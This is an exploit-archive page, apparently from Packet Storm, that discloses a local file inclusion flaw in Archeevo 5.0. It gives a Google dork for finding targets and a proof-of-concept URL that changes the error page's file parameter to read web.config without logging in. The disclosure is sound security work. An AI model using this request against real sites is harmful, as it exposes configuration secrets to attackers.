Home[1] Files[2] News[3] Contact[4] Add New[5]
- Archeevo 5.0 Local File Inclusion[6]
- Authored by Miguel Santareno[7]
-
Archeevo version 5.0 suffers from a local file inclusion vulnerability.
- MD5 |
d4916c25ed879d611b512e54a177db61 - Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
# Exploit Title: Archeevo 5.0 - Local File Inclusion
# Google Dork: intitle:"archeevo"
# Date: 01/15/2021
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.keep.pt/
# Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/
# Version: < 5.0
# Tested on: windows
# 1. Description
Unauthenticated user can exploit LFI vulnerability in file parameter.
# 2. Proof of Concept (PoC)
Access a page that don’t exist like /test.aspx and then you will be redirected to
https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html
After that change the file /FileNotFoundPage.html to /web.config and you be able to see the
/web.config file of the application.
https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config
# 3. Research:
https://miguelsantareno.github.io/MoD_1.pdf
Follow us on Twitter
Follow us on
Facebook
Subscribe to an RSS
FeedFile Tags
- ActiveX[18] (932)
- Advisory[19] (76,537)
- Arbitrary[20] (14,931)
- BBS[21] (2,859)
- Bypass[22] (1,516)
- CGI[23] (1,009)
- Code Execution[24] (6,446)
- Conference[25] (665)
- Cracker[26] (797)
- CSRF[27] (3,246)
- DoS[28] (21,520)
- Encryption[29] (2,319)
- Exploit[30] (49,107)
- File Inclusion[31] (4,119)
- File Upload[32] (933)
- Firewall[33] (821)
- Info Disclosure[34] (2,531)
- Intrusion Detection[35] (841)
- Java[36] (2,719)
- JavaScript[37] (787)
- Kernel[38] (5,893)
- Local[39] (13,887)
- Magazine[40] (586)
- Overflow[41] (12,011)
- Perl[42] (1,409)
- PHP[43] (5,024)
- Proof of Concept[44] (2,273)
- Protocol[45] (3,229)
- Python[46] (1,365)
- Remote[47] (29,318)
- Root[48] (3,419)
- Ruby[49] (563)
- Scanner[50] (1,627)
- Security Tool[51] (7,627)
- Shell[52] (3,013)
- Shellcode[53] (1,192)
- Sniffer[54] (877)
- Spoof[55] (2,062)
- SQL Injection[56] (15,858)
- TCP[57] (2,345)
- Trojan[58] (666)
- UDP[59] (865)
- Virus[60] (657)
- Vulnerability[61] (30,112)
- Web[62] (8,860)
- Whitepaper[63] (3,696)
- x86[64] (939)
- XSS[65] (17,200)
- Other[66]
File Archives
- January 2022[67]
- December 2021[68]
- November 2021[69]
- October 2021[70]
- September 2021[71]
- August 2021[72]
- July 2021[73]
- June 2021[74]
- May 2021[75]
- April 2021[76]
- March 2021[77]
- February 2021[78]
- Older[79]
Systems
- AIX[80] (423)
- Apple[81] (1,853)
- BSD[82] (368)
- CentOS[83] (54)
- Cisco[84] (1,909)
- Debian[85] (5,946)
- Fedora[86] (1,690)
- FreeBSD[87] (1,241)
- Gentoo[88] (4,148)
- HPUX[89] (875)
- iOS[90] (309)
- iPhone[91] (108)
- IRIX[92] (220)
- Juniper[93] (67)
- Linux[94] (41,268)
- Mac OS X[95] (682)
- Mandriva[96] (3,105)
- NetBSD[97] (255)
- OpenBSD[98] (476)
- RedHat[99] (10,907)
- Slackware[100] (941)
- Solaris[101] (1,601)
- SUSE[102] (1,444)
- Ubuntu[103] (7,568)
- UNIX[104] (9,007)
- UnixWare[105] (182)
- Windows[106] (6,248)
- Other[107]
© 2020 Packet Storm. All rights reserved.
- Services
- Security Services[118]
- Hosting By
- Rokasec[119]
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
